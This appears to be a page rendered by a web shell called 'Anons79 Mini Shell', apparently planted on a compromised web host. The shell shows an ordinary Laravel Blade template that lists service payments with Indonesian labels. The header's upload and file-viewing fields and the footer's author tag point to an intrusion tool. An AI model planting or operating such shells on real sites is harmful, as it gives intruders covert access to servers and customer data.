Anons79 Mini Shell

Directory : /home/aplikasiposinfo/public_html/audigitalshop.fixmate.id/resources/views/refund/
Upload File :
Current File : /home/aplikasiposinfo/public_html/audigitalshop.fixmate.id/resources/views/refund/index.blade.php

@extends('layouts.app')

@section('content')
    <div class="container-fluid">
        <div class="block-header">
            <h2>Data Pembayaran Service</h2>
        </div>

        <div class="row clearfix">
            <!-- Task Info -->
            <div class="col-xs-12 col-sm-12 col-md-12">
                <div class="card">
                    <div class="header">
                    </div>
                    <div class="body">
                        @include('layouts.includes.filter')
                        <div class="table-responsive">
                            <table class="table table-hover dashboard-task-infos">
                                <thead>
                                    <tr>
                                        <th>Nomor Penjualan</th>
                                        <th>Pelanggan</th>
                                        <th>Total</th>
                                        <th>Jumlah Bayar</th>
                                        <th>Status</th>
                                        <th>Tools</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    @foreach ($datas as $data)
                                        <tr>
                                            <td>{{ $data->nomor_nota }}</td>
                                            <td>{{ $data->pelanggan->nama_pelanggan }}</td>
                                            <td>{{ number_format($data->total) }}</td>
                                            <td>{{ number_format($data->total_pembayaran_service) }}</td>
                                            <td>
                                                @if (!$data->status_lunas)
                                                    Belum Lunas
                                                @elseif($data->status_lunas)
                                                    Lunas
                                                @endif
                                            </td>
                                            <td>
                                                @if (!$data->status_lunas)
                                                    <a href="{{ route('pembayaran_service.edit', $data->id) }}"
                                                        class="btn btn-primary">Bayar</a>
                                                @endif
                                            </td>
                                    @endforeach
                                </tbody>

                                <tfoot>
                                    @include('layouts.includes.pagination')
                                </tfoot>
                            </table>
                        </div>
                    </div>
                </div>
            </div>
            <!-- #END# Task Info -->
        </div>
    </div>
@endsection

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]